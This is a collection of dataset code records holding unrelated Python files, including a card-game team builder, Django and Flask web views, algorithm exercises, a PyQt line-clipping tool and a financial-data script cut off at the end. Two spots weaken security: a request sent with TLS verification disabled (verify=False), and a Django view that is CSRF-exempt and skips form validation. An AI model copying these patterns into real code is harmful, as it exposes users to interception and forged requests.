if(remainingPoints >= minPoints):\n curTeam.addCharacter(thirdCharacter)\n if(remainingPoints >= minPoints):\n curTeam.addCharacter(fourthCharacter)\n teamList.add(curTeam)\n return teamList\n\ndef buildCombinations(characterList):\n minPoints = getMinCharacterPoints(characterList)\n print(\"min points = \" + str(minPoints))\n bar = progressbar.ProgressBar(max_value = len(characterList))\n i = 0\n for firstCharacter in characterList:\n i += 1\n bar.update(i)\n for secondCharacter in characterList:\n for thirdCharacter in characterList:\n for fourthCharacter in characterList:\n curTeam = Team(firstCharacter)\n remainingPoints = curTeam.addCharacter(secondCharacter)\n curTeam.addCharacter(thirdCharacter)\n curTeam.addCharacter(fourthCharacter)\n inListAlready = any([curTeam.getNames() == existingTeam.getNames() for existingTeam in teamList])\n if(not inListAlready):\n teamList.append(curTeam)\n return teamList\n\ndef createCsv(fileName):\n with open(fileName, 'w+', newline = '') as csvFile:\n swdWriter = csv.writer(csvFile)\n swdWriter.writerow(['Characters', 'Team Points', 'Team Health',\n 'Team Num Damage Sides', 'Team Total Damage Value',\n 'Team Num Ranged Damage Sides', 'Team Total Ranged Damage Value',\n 'Team Num Melee Damage Sides', 'Team Total Melee Damage Value',\n 'Team Num Focus Sides', 'Team Total Focus Value', 'Team Num Disrupt Sides',\n 'Team Total Disrupt Value', 'Team Num Discard Sides', 'Team Total Discard Value'])\n for team in teamList:\n swdWriter.writerow([str(team.getNames()), str(team.getPoints()), str(team.getHealth()),\n str(team.getOverallDamageInfo()['totalNumDamageSides']), str(team.getOverallDamageInfo()['totalDamageValue']),\n str(team.getOverallDamageInfo()['totalNumRangedDamageSides']), str(team.getOverallDamageInfo()['totalRangedDamageValue']),\n str(team.getOverallDamageInfo()['totalNumMeleeDamageSides']), str(team.getOverallDamageInfo()['totalMeleeDamageValue']),\n str(team.getFocusInfo()[0]), str(team.getFocusInfo()[1]), str(team.getDisruptInfo()[0]),\n str(team.getDisruptInfo()[1]), str(team.getDiscardInfo()[0]), str(team.getDiscardInfo()[1])])\n #if(team.getHealth() >= 30):\n #print(\"Final team is: \" + str(team.getNames()) + \" with \" + str(team.getPoints()) +\n # \" points, \" + str(team.getDamageInfo()) + \" damage sides and \" + str(team.getHealth()) + \" health.\")\n\n\nswdBaseURL = \"https://swdestinydb.com\"\nr = requests.get(swdBaseURL + \"/api/public/cards/?_format=json\", verify=False)\nallCards = r.json()\n\nteamList = []\n\nAFFILITATION = 'hero'\n\noneAffiliationCharacterList = getSWDESTINYDBCharacters(allCards, AFFILITATION)\n\noneAffiliationCharacterList = addProtoCharacters('protoChars.csv', oneAffiliationCharacterList, AFFILITATION)\n\nprint(\"Number of \" + AFFILITATION + \" characters is: \" + str(len(oneAffiliationCharacterList)))\n\nteamList = buildCombinationsHash(oneAffiliationCharacterList)\n\ncreateCsv('swdOutputHero.csv')\n\nteamList = []\n\nAFFILITATION = 'villain'\n\noneAffiliationCharacterList = getSWDESTINYDBCharacters(allCards, AFFILITATION)\n\noneAffiliationCharacterList = addProtoCharacters('protoChars.csv', oneAffiliationCharacterList, AFFILITATION)\n\nprint(\"Number of \" + AFFILITATION + \" characters is: \" + str(len(oneAffiliationCharacterList)))\n\nteamList = buildCombinationsHash(oneAffiliationCharacterList)\n\ncreateCsv('swdOutputVillian.csv')\n\n\"\"\"\nlabels = [str(team.getNames()) for team in teamList]\nx = [team.getHealth() for team in teamList]\ny = [team.getTotalNumDamageSides() for team in teamList]\n\nfig = plt.figure()\nax = fig.add_subplot(111)\nscatter = ax.scatter(x, y)\ntooltip = mpld3.plugins.PointLabelTooltip(scatter, labels=labels)\nax.set_xlabel('Total Team Health')\nax.set_ylabel('Total Number of damage sides')\nmpld3.plugins.connect(fig, tooltip)\n\nmpld3.show()\n#fig.show()\n\"\"\"\n","sub_path":"swdImport.py","file_name":"swdImport.py","file_ext":"py","file_size_in_byte":6898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"607606027","text":"import prepareData\nimport predict\nimport datetime\n\ndef predict_vm(ecs_lines, input_lines):\n # Do your work from here#\n n = 9\n result = []\n if ecs_lines is None:\n print ('ecs information is none')\n return result\n if input_lines is None:\n print ('input file information is none')\n return result\n\n trainData = prepareData.Data(ecs_lines, n)\n\n inputData = prepareData.InputMessage(input_lines)\n\n start = inputData.startTime.split('-')\n end = inputData.endTime.split('-')\n start = datetime.datetime(int(start[0]), int(start[1]), int(start[2]))\n end = datetime.datetime(int(end[0]), int(end[1]), int(end[2]))\n m = (end - start).days\n loop_max = 10000\n preResult = {}\n W = {}\n for elem in inputData.flavor:\n train = predict.Train(trainData.divData, trainData.divLabel, n, elem)\n preResult[elem] = trainData.data[elem][-n:]\n for i in range(loop_max):\n train.forwardPropagation(train.x)\n train.backwardPropagation()\n # if i % 100 == 0:\n # print(elem + ':' , train.loss)\n W[elem] = train.W\n t = 0\n for p in range(m):\n preResult[elem].append(round(train.dotProduct(preResult[elem][t: t + n - 1], W[elem])))\n t = t + 1\n preResult[elem] = preResult[elem][-m:]\n\n totalSum = 0\n for elem in preResult:\n totalSum += sum(preResult[elem])\n result.append(str(totalSum))\n\n for elem in preResult:\n preResult[elem] = sum(preResult[elem])\n result.append(elem + ' ' + str(preResult[elem]))\n result.append('')\n # result.append('predict end')\n\n pack = predict.Packing(preResult, inputData)\n\n pack.packing()\n\n packNum = len(pack.boxes)\n result.append(str(packNum))\n\n temp = [0] * pack.flavorsNum\n for i in range(packNum):\n for elem in pack.boxes[i][0]:\n temp[elem[0]-1] += 1\n result.append(str(i+1) + ' ')\n for j in range(len(temp)):\n if temp[j] != 0:\n result[-1] = result[-1] + 'flavor' + str(j+1) + ' ' + str(temp[j]) + ' '\n\n # print(ecs_lines)\n # for item in ecs_lines:\n # values = item.split(\"\\t\")\n # uuid = values[0]\n # flavorName = values[1]\n # createTime = values[2]\n\n # for index, item in input_lines:\n # print (\"index of input data\")\n\n return result\n\n","sub_path":"predictor.py","file_name":"predictor.py","file_ext":"py","file_size_in_byte":2389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"218075707","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('beneficiary', '0005_remove_beneficiary_group'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='beneficiary',\n name='group',\n field=models.ForeignKey(related_name='beneficiaries', blank=True, to='beneficiary.BeneficiaryGroup', null=True),\n preserve_default=True,\n ),\n ]\n","sub_path":"webapp/beneficiary/migrations/0006_beneficiary_group.py","file_name":"0006_beneficiary_group.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"305281624","text":"class Solution(object):\n def dailyTemperatures(self, temperatures):\n \"\"\"\n :type temperatures: List[int]\n :rtype: List[int]\n \"\"\"\n length = len(temperatures)\n if length == 1:\n return [0]\n i = 1\n result = []\n j = 0\n while j < length:\n result.append(0)\n j += 1\n stack = [0]\n while i < length:\n j = len(stack) - 1\n if temperatures[i] <= temperatures[stack[j]]:\n stack.append(i)\n else:\n while j >= 0:\n if temperatures[stack[j]] < temperatures[i]:\n top = stack.pop()\n result[top] = i - top\n j -= 1\n else:\n break;\n stack.append(i)\n i += 1\n return result","sub_path":"dataStructure/Stack/DaliyTempratures.py","file_name":"DaliyTempratures.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"281509935","text":"def heapify(arr, heap_size, index):\n \"\"\"To heapify subtree rooted at index i.\n n is size of heap\n\n :param arr:\n :param heap_size:\n :param index:\n :return:\n \"\"\"\n largest = index # Initialize largest as root\n left_child = 2 * index + 1 # left = 2*i + 1\n right_child = 2 * index + 2 # right = 2*i + 2\n\n # See if left child of root exists and is\n # greater than root\n if left_child < heap_size and arr[index] < arr[left_child]:\n largest = left_child\n\n # See if right child of root exists and is\n # greater than root\n if right_child < heap_size and arr[largest] < arr[right_child]:\n largest = right_child\n\n # Change root, if needed\n if largest != index:\n arr[index], arr[largest] = arr[largest], arr[index] # swap\n # Heapify the root.\n heapify(arr, heap_size, largest)\n\n\n# The main function to sort an array of given size\ndef heap_sort(arr):\n size = len(arr)\n # Build a maxheap.\n # Since last parent will be at ((n//2)-1) we can start at that location.\n for i in range(size // 2 - 1, -1, -1):\n heapify(arr, size, i)\n print(arr)\n\n # One by one extract elements\n for i in range(size - 1, 0, -1):\n arr[i], arr[0] = arr[0], arr[i] # swap\n heapify(arr, i, 0)\n\n\n# Driver code to test above\narr = [12, 11, 13, 5, 6, 7]\nheap_sort(arr)\nn = len(arr)\nprint(\"Sorted array is\")\nprint(arr)","sub_path":"Week_02/heap_sort_recursive.py","file_name":"heap_sort_recursive.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"136977989","text":"from flask import Flask\nfrom flask_bcrypt import Bcrypt\nfrom flask_migrate import Migrate\nfrom flask_s3 import FlaskS3\nfrom flask_sessions import Sessions\n\nfrom web.db import db\nfrom web.exceptions import AppExceptionHandlers\n\nfrom .admin_views import (add_admin_views, admin,\n set_skill_model_view_icon_choices)\nfrom .utils.view import CustomJSONEncoder\n\nsessions = Sessions()\ns3 = FlaskS3()\n\n\ndef create_base_app(settings):\n validate_settings(settings)\n app = Flask(__name__)\n\n app.config.update(settings)\n app.secret_key = app.config['SECRET_KEY']\n app.json_encoder = CustomJSONEncoder\n\n db.init_app(app)\n app.db = db\n Migrate(app, app.db)\n\n Bcrypt(app)\n sessions.init_app(app)\n s3.init_app(app)\n\n admin.init_app(app)\n set_skill_model_view_icon_choices(app.static_folder)\n add_admin_views()\n\n register_blueprints(app)\n AppExceptionHandlers.register_all(app)\n\n return app\n\n\ndef validate_settings(settings):\n required_configs = [\n 'SECRET_KEY', 'SQLALCHEMY_DATABASE_URI', 'NOTIFIER_API_KEY'\n ]\n for config_key in required_configs:\n if settings.get(config_key) is None:\n raise Exception('Missing required configuration: {}'.format(config_key))\n\n\ndef get_app():\n from flask import current_app as app\n if not app:\n from . import config\n app = create_base_app(config.SETTINGS)\n return app\n\n\ndef register_blueprints(app):\n from .blueprints.index import index\n from .blueprints.favicon import favicon\n from .blueprints.account import account\n from .blueprints.contact_me import contact_me\n from .blueprints.message import message\n app.register_blueprint(index)\n app.register_blueprint(favicon)\n app.register_blueprint(account, url_prefix='/account')\n app.register_blueprint(contact_me)\n app.register_blueprint(message)\n","sub_path":"web/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"305545322","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom django.shortcuts import render\nfrom django.http import Http404\nfrom django.http import HttpResponse\nfrom django.http import HttpResponseRedirect\nfrom django.contrib.auth import authenticate\nfrom django.contrib.auth import logout\nfrom django.contrib.auth import login\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.decorators import login_required\nfrom django.template import loader\n\n#from rolepermissions.roles import assign_role\n\nfrom unti.models import Order\nfrom unti.models import OrderType\nfrom unti.models import Action\n\nfrom unti.forms import FormSearch\nfrom unti.forms import FormNewOrder\nfrom unti.forms import FormNewAction\nfrom unti.forms import FormLogin\nfrom unti.forms import FormRegister\nfrom unti.views_login_reg import *\nfrom unti.views_orders_management import *\nfrom unti.views_new_orders import *\nfrom unti.models import Attachment\nfrom unti.models import Company\nfrom unti.models import log\nfrom unti.models import LogLine\n\ndef react(request):\n return render(request, \"index.html\", {})\n\n@login_required\ndef index(request):\n current_user = request.user\n log(current_user.last_name, \"index\")\n all_orders = Order.objects.all()\n my_orders = []\n for _order in all_orders:\n if _order.current_user_id == current_user.id or _order.user_id == current_user.id:\n my_orders.append({\"order\":_order,\"doc_path\":doc_path_f(_order)})\n\n order_types = OrderType.objects.all()\n current_user = request.user\n allowed_order_types = []\n for i in order_types:\n allowed = False\n if i.requires_permission == \"\":\n allowed = True\n else:\n for my_per in [perm[1] for perm in current_user.groups.values_list()]:\n if my_per == i.requires_permission:\n allowed = True\n if allowed:\n allowed_order_types.append(i)\n\n if request.method == \"POST\":\n form = FormSearch(request.POST)\n data = form.data\n log(current_user.last_name, \"index SEARCH \" + data['search'])\n if form.is_valid():\n s = data['search']\n filtered = []\n for _order in my_orders:\n yes = False\n if (s.lower() in _order[\"order\"].company.company_bin.lower()) or \\\n (s.lower() in _order[\"order\"].company.company_name.lower()) or \\\n (s.lower() in str(_order[\"order\"]).lower()) or \\\n (s == str(_order[\"order\"].id)) or \\\n (s.lower() in _order[\"order\"].current_user_name.lower()) or\\\n (s.lower() in _order[\"order\"].user_name.lower()) or\\\n (s.lower() in _order[\"order\"].company.company_email):\n yes = True\n for j in _order[\"order\"].action_set.all():\n if not (j.fields is None):\n if s.lower() in j.fields.lower():\n yes = True\n if not (j.action is None):\n if s.lower() in j.action.lower():\n yes = True\n for _file in Attachment.objects.all():\n if (s.lower() in _file.file_name.lower()) and (_file.parent_id == str(j.id)):\n yes = True\n if yes:\n filtered.append(_order)\n context = {'all_orders': filtered, 'searched': s, }\n return render(request, \"oms-form-orders-list.html\", context, {'form': form})\n form = FormSearch()\n context = {'all_orders': my_orders[0:10], 'user': current_user, \"companies\":Company.objects.all(),\n \"order_types\":allowed_order_types}\n return render(request, \"oms-form-orders-list.html\", context, {'form': form})\n\n\n@login_required\ndef companies(request):\n current_user = request.user\n log(current_user.last_name, \"companies list\")\n all_orders = Order.objects.all()\n my_orders = []\n filtered = []\n\n for i in all_orders:\n if i.current_user_id == current_user.id or i.user_id == current_user.id:\n my_orders.append(i)\n if request.method == \"POST\":\n form = FormSearch(request.POST)\n data = form.data\n log(current_user.last_name, \"companies list SEARCH \" + data[\"search\"])\n if form.is_valid():\n s = data['search']\n filtered = []\n for i in Company.objects.all().order_by('-id'):\n if (s.lower() in i.company_bin.lower()) or (s.lower() in i.company_name.lower()) or (s == str(i.id)) \\\n or (s.lower() in i.company_email):\n filtered.append(i)\n context = {'all_companies': filtered, 'searched': s, }\n return render(request, \"oms-form-companies-list.html\", context, {'form': form})\n form = FormSearch()\n context = {'all_companies': Company.objects.all().order_by('-id')[:10], 'user': current_user,\n 'toos': GeneralDirectory.objects.filter(directory=\"opf\"),\n 'statuses': GeneralDirectory.objects.filter(directory=\"status\"),\n 'regions': GeneralDirectory.objects.filter(directory=\"region\"),\n }\n return render(request, \"oms-form-companies-list.html\", context, {'form': form})\n\n@login_required\n@csrf_exempt\ndef newcompany(request):\n current_user = request.user\n form = FormNewCompany()\n if request.method == \"POST\":\n form = FormNewCompany(request.POST)\n data = form.data\n log(current_user.last_name, \"New company \" + data['company_name'])\n if form.is_valid() or True:\n cmp = Company()\n cmp.company_name = data['company_name']\n cmp.company_bin = data['company_bin']\n cmp.company_inn = data['company_inn']\n cmp.company_email = data['company_email']\n cmp.too_id = int(data['opf'])\n cmp.status_id = int(data['status'])\n cmp.region_id = int(data['region'])\n cmp.address = data['address']\n cmp.contact_person = data['contact_person']\n cmp.contact_details = data['contact_details']\n cmp.user_name = current_user.first_name + \" \" + current_user.last_name\n cmp.user_id = current_user.id\n cmp.save()\n return HttpResponseRedirect(\"/orders/company\"+str(cmp.id))\n else:\n print(form.errors)\n context = {'user': current_user, 'toos': GeneralDirectory.objects.filter(directory=\"opf\"),\n 'statuses': GeneralDirectory.objects.filter(directory=\"status\"),\n 'regions': GeneralDirectory.objects.filter(directory=\"region\"),\n 'errors': form.errors}\n #return render(request, \"oms-form-newcompany.html\", context, {'form': form})\n return HttpResponseRedirect(\"/\")\n\n\ndef log_view(request):\n context = {'logs': LogLine.objects.all()}\n return render(request, \"log_view.html\", context)","sub_path":"unti/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"388349868","text":"from art import logo, vs\r\nfrom game_data import data\r\nimport random\r\nimport os\r\n\r\ndef format_data(account):\r\n account_name = account[\"name\"]\r\n account_descr = account[\"description\"]\r\n account_country = account[\"country\"]\r\n return f\"{account_name}, a {account_descr}, from {account_country}\"\r\n\r\ndef check_answer(guess, a_followers, b_followers):\r\n if a_followers > b_followers:\r\n return guess == \"a\"\r\n else:\r\n return guess == \"b\"\r\n\r\nprint(logo)\r\nscore = 0\r\ngame_should_continue = True\r\naccount_b = random.choice(data)\r\n\r\nwhile game_should_continue:\r\n\r\n#Generating a randoom account from the game data\r\n account_a = account_b\r\n account_b = random.choice(data)\r\n if account_a == account_b:\r\n account_b = random.choice(data)\r\n\r\n print(f\"Compare A: {format_data(account_a)}.\")\r\n print(vs)\r\n print(f\"Against B: {format_data(account_b)}.\")\r\n\r\n\r\n #Ask user for a guess\r\n guess = input(\"Who has more followers? Give your choice 'A' or 'B': \").lower()\r\n\r\n ##Get follower count of each account\r\n\r\n a_follower_count = account_a[\"follower_count\"]\r\n b_follower_count = account_b[\"follower_count\"]\r\n is_correct = check_answer(guess, a_follower_count, b_follower_count)\r\n\r\n os.system('cls') #Clear the screen between rounds\r\n\r\n #Giver user feedback on their guess\r\n if is_correct:\r\n score += 1\r\n print(f\"You are right! Current score is: {score}.\")\r\n else:\r\n game_should_continue = False\r\n print(f\"Sorry, Better luck next time! Final score is: {score}.\")\r\n\r\n\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"432209468","text":"from django.conf.urls import url\n\nfrom classification.api.alike import (\n all_confirmed_alike,\n all_voted_alike_user,\n vote_alike,\n\n all_confirmed_alike_staff,\n alike_admin,\n\n all_unconfirmed_suggested_alike,\n)\n\n\nurlpatterns = [\n url(r'^voted_all/(?P[A-Z0-9]{5})/$',\n all_voted_alike_user),\n url(r'^vote/(?P[A-Z0-9]{5})/(?P[A-Z0-9]{5})/$',\n vote_alike),\n url(r'^confirmed/(?P[A-Z0-9]{5})/$',\n all_confirmed_alike),\n\n\n # ADMIN\n url(r'^admin/confirmed/staff/(?P\\d+)/$',\n all_confirmed_alike_staff),\n url(r'^admin/(?P\\d+)/(?P\\d+)/$',\n alike_admin),\n url(r'^admin/suggested/unconfirmed/all/$',\n all_unconfirmed_suggested_alike),\n]\n","sub_path":"eshop-index-back/classification/urls/alike.py","file_name":"alike.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"378489717","text":"from PyQt5 import QtWidgets, uic\nfrom PyQt5.QtWidgets import QTableWidgetItem, QMessageBox\nfrom PyQt5.QtGui import QPen, QColor, QImage, QPixmap, QPainter, QTransform\nfrom PyQt5.QtCore import Qt, QTime, QCoreApplication, QEventLoop, QPoint\nimport time\nimport math as m\n\nred = Qt.darkGreen\nblue = Qt.red\nnow = None\n\nclass Window(QtWidgets.QMainWindow):\n def __init__(self):\n QtWidgets.QWidget.__init__(self)\n uic.loadUi(\"window.ui\", self)\n self.scene = Scene(0, 0, 561, 581)\n self.scene.win = self\n self.view.setScene(self.scene)\n self.image = QImage(561, 581, QImage.Format_ARGB32_Premultiplied)\n self.image.fill(Qt.white)\n self.bars.clicked.connect(lambda : set_bars(self))\n self.erase.clicked.connect(lambda: clean_all(self))\n self.paint.clicked.connect(lambda: clipping(self))\n self.rect.clicked.connect(lambda: set_rect(self))\n self.ect.clicked.connect(lambda: add_bars(self))\n self.lines = []\n self.clip = None\n self.point_now = None\n self.input_bars = False\n self.input_rect = False\n self.pen = QPen(red)\n\n\nclass Scene(QtWidgets.QGraphicsScene):\n\n def mousePressEvent(self, event):\n add_point(event.scenePos())\n\n def mouseMoveEvent(self, event):\n global now, w\n if w.input_rect:\n if now is None:\n now = event.scenePos()\n else:\n self.removeItem(self.itemAt(now, QTransform()))\n p = event.scenePos()\n self.addRect(now.x(), now.y(), abs(now.x() - p.x()), abs(now.y() - p.y()), QPen(Qt.blue))\n\n\n\ndef set_bars(win):\n if win.input_bars:\n win.input_bars = False\n win.rect.setDisabled(False)\n win.erase.setDisabled(False)\n win.paint.setDisabled(False)\n win.ect.setDisabled(False)\n else:\n win.input_bars = True\n win.rect.setDisabled(True)\n win.erase.setDisabled(True)\n win.paint.setDisabled(True)\n win.ect.setDisabled(True)\n\n\ndef set_rect(win):\n if win.input_rect:\n win.input_rect = False\n win.bars.setDisabled(False)\n win.erase.setDisabled(False)\n win.paint.setDisabled(False)\n win.ect.setDisabled(False)\n else:\n win.input_rect = True\n win.bars.setDisabled(True)\n win.erase.setDisabled(True)\n win.paint.setDisabled(True)\n win.ect.setDisabled(True)\n\n\ndef add_row(win):\n win.table.insertRow(win.table.rowCount())\n\n\ndef add_point(point):\n global w\n if w.input_bars:\n if w.point_now is None:\n w.point_now = point\n else:\n w.lines.append([[w.point_now.x(), w.point_now.y()],\n [point.x(), point.y()]])\n\n add_row(w)\n i = w.table.rowCount() - 1\n item_b = QTableWidgetItem(\"[{0}, {1}]\".format(w.point_now.x(), w.point_now.y()))\n item_e = QTableWidgetItem(\"[{0}, {1}]\".format(point.x(), point.y()))\n w.table.setItem(i, 0, item_b)\n w.table.setItem(i, 1, item_e)\n w.scene.addLine(w.point_now.x(), w.point_now.y(), point.x(), point.y(), w.pen)\n w.point_now = None\n\n\ndef clean_all(win):\n win.scene.clear()\n win.table.clear()\n win.lines = []\n win.image.fill(Qt.white)\n r = win.table.rowCount()\n for i in range(r, -1, -1):\n win.table.removeRow(i)\n\n\ndef add_bars(win):\n global now\n if now is None:\n QMessageBox.warning(win, \"Ошибка\", \"Не введен отсекатель!\")\n return\n buf = win.scene.itemAt(now, QTransform())\n if buf is None:\n QMessageBox.warning(win, \"Ошибка\", \"Не введен отсекатель!\")\n else:\n buf = buf.rect()\n win.clip = [buf.left(), buf.right(), buf.top(), buf.bottom()]\n\n t = abs(win.clip[2] - win.clip[3]) * 0.8\n k = abs(win.clip[0] - win.clip[1]) * 0.8\n # задаем граничные отрезки\n win.pen.setColor(red)\n w.lines.append([[win.clip[0], win.clip[2] + t], [win.clip[0], win.clip[3] - t]])\n add_row(w)\n i = w.table.rowCount() - 1\n item_b = QTableWidgetItem(\"[{0}, {1}]\".format(win.clip[0], win.clip[2] + t))\n item_e = QTableWidgetItem(\"[{0}, {1}]\".format(win.clip[0], win.clip[3] - t))\n w.table.setItem(i, 0, item_b)\n w.table.setItem(i, 1, item_e)\n win.scene.addLine(win.clip[0], win.clip[2] + t, win.clip[0], win.clip[3] - t, win.pen)\n\n w.lines.append([[win.clip[1], win.clip[2] + t], [win.clip[1], win.clip[3] - t]])\n add_row(w)\n i = w.table.rowCount() - 1\n item_b = QTableWidgetItem(\"[{0}, {1}]\".format(win.clip[1], win.clip[2] + t))\n item_e = QTableWidgetItem(\"[{0}, {1}]\".format(win.clip[1], win.clip[3] - t))\n w.table.setItem(i, 0, item_b)\n w.table.setItem(i, 1, item_e)\n win.scene.addLine(win.clip[1], win.clip[3] - t, win.clip[1], win.clip[2] + t, win.pen)\n\n w.lines.append([[win.clip[0] + k, win.clip[2]], [win.clip[1] - k, win.clip[2]]])\n add_row(w)\n i = w.table.rowCount() - 1\n item_b = QTableWidgetItem(\"[{0}, {1}]\".format(win.clip[0] + k, win.clip[2]))\n item_e = QTableWidgetItem(\"[{0}, {1}]\".format(win.clip[1] - k, win.clip[2]))\n w.table.setItem(i, 0, item_b)\n w.table.setItem(i, 1, item_e)\n win.scene.addLine(win.clip[0] + k, win.clip[2], win.clip[1] - k, win.clip[2], win.pen)\n\n w.lines.append([[win.clip[0] + k, win.clip[3]], [win.clip[1] - k, win.clip[3]]])\n add_row(w)\n i = w.table.rowCount() - 1\n item_b = QTableWidgetItem(\"[{0}, {1}]\".format(win.clip[0] + k, win.clip[3]))\n item_e = QTableWidgetItem(\"[{0}, {1}]\".format(win.clip[1] - k, win.clip[3]))\n w.table.setItem(i, 0, item_b)\n w.table.setItem(i, 1, item_e)\n win.scene.addLine(win.clip[0] + k, win.clip[3], win.clip[1] - k, win.clip[3], win.pen)\n\ndef clipping(win):\n buf = win.scene.itemAt(now, QTransform()).rect()\n win.clip = [buf.left(), buf.right(), buf.top(), buf.bottom()]\n for b in win.lines:\n pass\n win.pen.setColor(blue)\n modPoint(b, win.clip, win)\n win.pen.setColor(red)\n\ndef getCode(a, rect):\n code = [0, 0, 0, 0]\n if a[0] < rect[0]:\n code[0] = 1\n if a[0] > rect[1]:\n code[1] = 1\n if a[1] < rect[2]:\n code[2] = 1\n if a[1] > rect[3]:\n code[3] = 1\n\n return code\n\ndef codeSum(CODE):\n Sum = 0\n for i in range(0, 4):\n Sum += CODE[i]\n return Sum\n\ndef codesMult(code1, code2):\n Comp = 0\n for i in range(0, 4):\n Comp += int((code1[i] + code2[i])/2)\n return Comp\n\ndef cutDouble(R, i, epsilon, rect) :\n global point1\n global point2\n global Pcp\n global Pm\n global code1\n global code2\n \n while True:\n if((abs(point1[0] - point2[0]) < epsilon) and (abs(point1[1] - point2[1]) < epsilon)):\n return \n\n xcp = round((point1[0] + point2[0]) / 2)\n ycp = round((point1[1] + point2[1]) / 2) \n Pcp = [xcp, ycp] \n \n Pm = point1 \n point1 = Pcp\n\n code1 = getCode(point1, rect)\n Comp = codesMult(code1, code2) \n \n if(Comp == 0):\n continue\n\n point1 = Pm\n point2 = Pcp\n continue\n\ndef modPoint(bar, rect, win):\n global point1\n global point2\n\n global Pcp\n global Pm\n global code1\n global code2\n\n i = 1\n\n Pcp = 0\n Pm = 0\n\n epsilon = m.sqrt(2)\n\n point1 = bar[0]\n point2 = bar[1]\n\n while True:\n\n code1 = getCode(point1, rect)\n code2 = getCode(point2, rect)\n\n S1 = codeSum(code1)\n S2 = codeSum(code2)\n\n if(S1 == S2 == 0):\n win.scene.addLine(point1[0], point1[1], point2[0], point2[1], win.pen)\n return\n\n if(codesMult(code1, code2) != 0):\n return\n\n R = point1\n\n if(i > 2):\n if(codesMult(code1, code2) == 0):\n win.scene.addLine(point1[0], point1[1], point2[0], point2[1], win.pen)\n return\n\n if(S2 == 0):\n point1 = point2\n point2 = R\n i += 1 \n continue \n\n\n cutDouble(R, i, epsilon, rect)\n\n #point1 = point1\n point2 = R\n i += 1\n continue\n\n\n\n\n print(S1, S2)\n\nif __name__ == \"__main__\":\n import sys\n app = QtWidgets.QApplication(sys.argv)\n w = Window()\n w.show()\n sys.exit(app.exec_())\n","sub_path":"lab07/lab7_1.py","file_name":"lab7_1.py","file_ext":"py","file_size_in_byte":8574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"183897635","text":"\"\"\"\nGroup Anagrams\nhttps://leetcode.com/explore/interview/card/top-interview-questions-medium/103/array-and-strings/778/\n\n_author: Kashif Memon\n_python_version: 3.7.2\n\"\"\"\n\n\nclass Solution:\n def groupAnagrams(self, strs: 'List[str]') -> 'List[List[str]]':\n out = {}\n for item in strs:\n s_item = \"\".join(sorted(item))\n if s_item in out:\n out[s_item].append(item)\n else:\n out[s_item] = [item]\n return out.values()\n\n # Time Limit Exceeded\n # out = []\n # s_strs = []\n # for item in strs:\n # s_strs.append(\"\".join(sorted(item)))\n #\n # for _ in range(len(set(s_strs))):\n # item = \"\".join(sorted(strs[0]))\n # intermediate = []\n # val_idx = [index for index, val in enumerate(s_strs) if val == item]\n # intermediate[:] = [strs[index] for index in val_idx]\n # strs[:] = [val for idx, val in enumerate(strs) if idx not in val_idx]\n # s_strs[:] = [val for _, val in enumerate(s_strs) if val != item]\n # out.append(intermediate)\n # return out\n\n\ndef main():\n print(Solution().groupAnagrams([\"eat\", \"tea\", \"tan\", \"ate\", \"nat\", \"bat\"]))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"solutions-to-leetcode/interview-medium/arrays & strings/a_group_anagrams.py","file_name":"a_group_anagrams.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"534361123","text":"import sys\nimport math\n\nimport time\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport missingno as msno\nimport seaborn as sns\nimport scipy.stats as stats\n\nfrom multiprocessing import cpu_count\nfrom tqdm import tqdm, tqdm_notebook\n\nfrom mpengine import mpPandasObj\n\n# Daily Volatility Estimator [3.1]\ndef getDailyVol(close, span0 = 100):\n df0 = close.index.searchsorted(close.index - pd.Timedelta(days=1))\n df0 = df0[df0>0]\n df0 = pd.Series(close.index[df0-1], index = close.index[close.shape[0]-df0.shape[0]:])\n\n try:\n df0 = close.loc[df0.index] / close.loc[df0.values].values - 1\n #df0 = np.log(close.loc[df0.index] / close.loc[df0.values].values)\n except Exception as e:\n print ('error: {e}\\n please confirm duplicate indices')\n\n df0 = df0.ewm(span=span0).std().rename('dailyVol')\t\t\n return df0\n\n# Symmetric CUSUM Filter [2.5.2.1]\ndef getTEvents(gRaw, h):\n tEvents, sPos, sNeg = [], 0, 0\n sEvents, pEvents = [], []\n\n #diff = np.log(gRaw).diff().dropna().abs()\n #diff = np.log(gRaw).diff().dropna()\n diff = gRaw.diff()\n\n #gRaw0 = gRaw[:-1]\n #gRaw1 = gRaw[1:]\n\n #diff = np.divide(gRaw1, gRaw0) - 1\n\n for i in tqdm(diff.index[1:]):\n try:\n pos, neg = float(sPos + diff.loc[i]), float(sNeg + diff.loc[i])\n except Exception as e:\n print(e)\n print(sPos + diff.loc[i], type(sPos 